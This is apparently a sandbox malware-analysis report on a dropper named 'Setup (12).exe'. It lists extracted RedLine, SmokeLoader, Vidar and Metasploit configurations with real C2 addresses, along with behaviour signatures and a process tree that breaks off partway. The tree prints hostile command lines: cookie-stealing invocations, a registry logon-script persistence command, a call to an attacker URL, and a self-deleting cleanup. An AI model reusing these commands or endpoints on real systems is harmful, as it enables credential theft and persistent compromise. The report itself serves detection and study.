Analysis

  • max time kernel
    1560s
  • max time network
    1823s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 07:49

General

  • Target

    Setup (12).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 10 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 2 IoCs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 17 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 29 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 26 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 20 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 35 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:352
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:1064
      • C:\Users\Admin\AppData\Roaming\edfaghe
        C:\Users\Admin\AppData\Roaming\edfaghe
        2⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:8096
      • C:\Users\Admin\AppData\Roaming\edfaghe
        C:\Users\Admin\AppData\Roaming\edfaghe
        2⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:6920
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1456
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1864
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2272
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2428
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
              • Suspicious use of SetThreadContext
              PID:2656
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                PID:6056
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2436
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                  PID:2320
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1396
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1288
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1148
                      • C:\Users\Admin\AppData\Local\Temp\Setup (12).exe
                        "C:\Users\Admin\AppData\Local\Temp\Setup (12).exe"
                        1⤵
                        • Checks computer location settings
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:656
                        • C:\Users\Admin\Documents\_eZJBXEb6QMPVe0GS_OzmUpo.exe
                          "C:\Users\Admin\Documents\_eZJBXEb6QMPVe0GS_OzmUpo.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:2168
                          • C:\Users\Admin\Documents\_eZJBXEb6QMPVe0GS_OzmUpo.exe
                            C:\Users\Admin\Documents\_eZJBXEb6QMPVe0GS_OzmUpo.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4964
                        • C:\Users\Admin\Documents\cbB7OH7OVtUWTBFGRxCxrW_h.exe
                          "C:\Users\Admin\Documents\cbB7OH7OVtUWTBFGRxCxrW_h.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2112
                        • C:\Users\Admin\Documents\Yfm1zBGgaI4qo3VcxXkRUjoZ.exe
                          "C:\Users\Admin\Documents\Yfm1zBGgaI4qo3VcxXkRUjoZ.exe"
                          2⤵
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2844
                        • C:\Users\Admin\Documents\6nacBmNTMFKXmDRRRoQ5ugy8.exe
                          "C:\Users\Admin\Documents\6nacBmNTMFKXmDRRRoQ5ugy8.exe"
                          2⤵
                            PID:3576
                            • C:\Users\Admin\Documents\6nacBmNTMFKXmDRRRoQ5ugy8.exe
                              "C:\Users\Admin\Documents\6nacBmNTMFKXmDRRRoQ5ugy8.exe" -q
                              3⤵
                                PID:5016
                            • C:\Users\Admin\Documents\KtVikyqCguwJ8jK_H2p6nzPo.exe
                              "C:\Users\Admin\Documents\KtVikyqCguwJ8jK_H2p6nzPo.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2068
                            • C:\Users\Admin\Documents\N36roKyPyHOyBovsoKsBdnt5.exe
                              "C:\Users\Admin\Documents\N36roKyPyHOyBovsoKsBdnt5.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1112
                            • C:\Users\Admin\Documents\8fzJPVaE3JDomAAZf3w3qok0.exe
                              "C:\Users\Admin\Documents\8fzJPVaE3JDomAAZf3w3qok0.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3816
                            • C:\Users\Admin\Documents\2NZHGACOi3k0gCh_Hs1hd1JW.exe
                              "C:\Users\Admin\Documents\2NZHGACOi3k0gCh_Hs1hd1JW.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:3568
                              • C:\Users\Admin\Documents\2NZHGACOi3k0gCh_Hs1hd1JW.exe
                                C:\Users\Admin\Documents\2NZHGACOi3k0gCh_Hs1hd1JW.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4940
                            • C:\Users\Admin\Documents\AH8Qf98IQVaLg4_eZOJBNEMN.exe
                              "C:\Users\Admin\Documents\AH8Qf98IQVaLg4_eZOJBNEMN.exe"
                              2⤵
                                PID:2020
                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4264
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4900
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                      PID:4536
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                        PID:4300
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        4⤵
                                          PID:792
                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        • Drops file in Program Files directory
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4304
                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        PID:4340
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                          • Executes dropped EXE
                                          PID:1592
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                            PID:3000
                                          • C:\Windows\system32\WerFault.exe
                                            C:\Windows\system32\WerFault.exe -u -p 4340 -s 1420
                                            4⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2808
                                      • C:\Users\Admin\Documents\N1i1XJkXWLfI0W0UjEvqJliK.exe
                                        "C:\Users\Admin\Documents\N1i1XJkXWLfI0W0UjEvqJliK.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:3888
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 660
                                          3⤵
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4820
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 648
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2108
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 704
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4176
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 740
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5004
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 896
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4804
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 1112
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4328
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 1084
                                          3⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Executes dropped EXE
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4536
                                      • C:\Users\Admin\Documents\_ivLxeS4CTTvdHB0Z2VlaWie.exe
                                        "C:\Users\Admin\Documents\_ivLxeS4CTTvdHB0Z2VlaWie.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:820
                                      • C:\Users\Admin\Documents\kIKWtS96CE5D39LLKNvKcq3X.exe
                                        "C:\Users\Admin\Documents\kIKWtS96CE5D39LLKNvKcq3X.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2212
                                        • C:\Users\Admin\AppData\Roaming\8799196.exe
                                          "C:\Users\Admin\AppData\Roaming\8799196.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:32
                                        • C:\Users\Admin\AppData\Roaming\7142260.exe
                                          "C:\Users\Admin\AppData\Roaming\7142260.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          PID:3908
                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:208
                                      • C:\Users\Admin\Documents\v51GYAsaWV9I1d6xRod5RyYJ.exe
                                        "C:\Users\Admin\Documents\v51GYAsaWV9I1d6xRod5RyYJ.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:1812
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 760
                                          3⤵
                                          • Program crash
                                          PID:5964
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 784
                                          3⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          • Program crash
                                          • Suspicious use of WriteProcessMemory
                                          PID:2020
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 788
                                          3⤵
                                          • Program crash
                                          PID:5784
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 824
                                          3⤵
                                          • Program crash
                                          PID:768
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 964
                                          3⤵
                                          • Program crash
                                          PID:5572
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 992
                                          3⤵
                                          • Program crash
                                          PID:5936
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 1032
                                          3⤵
                                          • Program crash
                                          PID:2748
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 1428
                                          3⤵
                                          • Program crash
                                          PID:5804
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 1460
                                          3⤵
                                          • Program crash
                                          PID:728
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 1504
                                          3⤵
                                          • Program crash
                                          PID:6736
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 900
                                          3⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          PID:7100
                                      • C:\Users\Admin\Documents\X5LxyLBKN1AKhvlr2WQfF7n1.exe
                                        "C:\Users\Admin\Documents\X5LxyLBKN1AKhvlr2WQfF7n1.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:2140
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 664
                                          3⤵
                                          • Drops file in Windows directory
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4832
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 676
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1544
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 688
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4884
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 804
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1876
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 908
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4896
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 1112
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4336
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 1088
                                          3⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:188
                                      • C:\Users\Admin\Documents\GrjULCkM7dcyQTu59djYwUPo.exe
                                        "C:\Users\Admin\Documents\GrjULCkM7dcyQTu59djYwUPo.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:2512
                                      • C:\Users\Admin\Documents\8m_N8mDLXk59plB2KeJPBRJz.exe
                                        "C:\Users\Admin\Documents\8m_N8mDLXk59plB2KeJPBRJz.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:412
                                      • C:\Users\Admin\Documents\1XrjKV2E1Oc2RnZXpCXyX0hU.exe
                                        "C:\Users\Admin\Documents\1XrjKV2E1Oc2RnZXpCXyX0hU.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:3984
                                        • C:\Users\Admin\Documents\1XrjKV2E1Oc2RnZXpCXyX0hU.exe
                                          "C:\Users\Admin\Documents\1XrjKV2E1Oc2RnZXpCXyX0hU.exe"
                                          3⤵
                                          • Modifies data under HKEY_USERS
                                          PID:7544
                                      • C:\Users\Admin\Documents\B3L0LoFZcVrRcjkrRZQrfJex.exe
                                        "C:\Users\Admin\Documents\B3L0LoFZcVrRcjkrRZQrfJex.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious behavior: MapViewOfSection
                                        PID:2912
                                      • C:\Users\Admin\Documents\ioiIzCuslaCN9kbVhlepV1ea.exe
                                        "C:\Users\Admin\Documents\ioiIzCuslaCN9kbVhlepV1ea.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:2908
                                        • C:\Users\Admin\Documents\ioiIzCuslaCN9kbVhlepV1ea.exe
                                          C:\Users\Admin\Documents\ioiIzCuslaCN9kbVhlepV1ea.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4980
                                      • C:\Users\Admin\Documents\HxXWSQD5WNWTFJ8s0eeD2mJJ.exe
                                        "C:\Users\Admin\Documents\HxXWSQD5WNWTFJ8s0eeD2mJJ.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4288
                                    • C:\Users\Admin\AppData\Local\Temp\is-CQJH3.tmp\HxXWSQD5WNWTFJ8s0eeD2mJJ.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-CQJH3.tmp\HxXWSQD5WNWTFJ8s0eeD2mJJ.tmp" /SL5="$20210,138429,56832,C:\Users\Admin\Documents\HxXWSQD5WNWTFJ8s0eeD2mJJ.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of FindShellTrayWindow
                                      PID:4464
                                      • C:\Users\Admin\AppData\Local\Temp\is-7EIGR.tmp\Setup.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-7EIGR.tmp\Setup.exe" /Verysilent
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        PID:4376
                                        • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                          "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:4888
                                        • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                          "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                          3⤵
                                          • Executes dropped EXE
                                          PID:1500
                                          • C:\Users\Admin\AppData\Local\Temp\is-GP31T.tmp\Inlog.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-GP31T.tmp\Inlog.tmp" /SL5="$102F0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious use of FindShellTrayWindow
                                            PID:4412
                                            • C:\Users\Admin\AppData\Local\Temp\is-QK3L9.tmp\Setup.exe
                                              "C:\Users\Admin\AppData\Local\Temp\is-QK3L9.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                              5⤵
                                                PID:2916
                                                • C:\Users\Admin\AppData\Local\Temp\is-TF6B6.tmp\Setup.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-TF6B6.tmp\Setup.tmp" /SL5="$203E4,17369384,721408,C:\Users\Admin\AppData\Local\Temp\is-QK3L9.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                  6⤵
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:6692
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-EPJGB.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                    7⤵
                                                      PID:724
                                                      • C:\Windows\SysWOW64\expand.exe
                                                        expand C:\Users\Admin\AppData\Local\Temp\is-EPJGB.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                        8⤵
                                                        • Drops file in Windows directory
                                                        PID:6612
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                      7⤵
                                                        PID:8116
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                          8⤵
                                                            PID:8016
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                          7⤵
                                                            PID:8164
                                                          • C:\Users\Admin\AppData\Local\Temp\is-EPJGB.tmp\{app}\vdi_compiler.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-EPJGB.tmp\{app}\vdi_compiler"
                                                            7⤵
                                                              PID:8132
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-EPJGB.tmp\{app}\vdi_compiler.exe"
                                                                8⤵
                                                                  PID:8404
                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                    ping localhost -n 4
                                                                    9⤵
                                                                    • Runs ping.exe
                                                                    PID:8480
                                                              • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                7⤵
                                                                • Loads dropped DLL
                                                                PID:6752
                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Enumerates connected drives
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:4548
                                                        • C:\Windows\SysWOW64\msiexec.exe
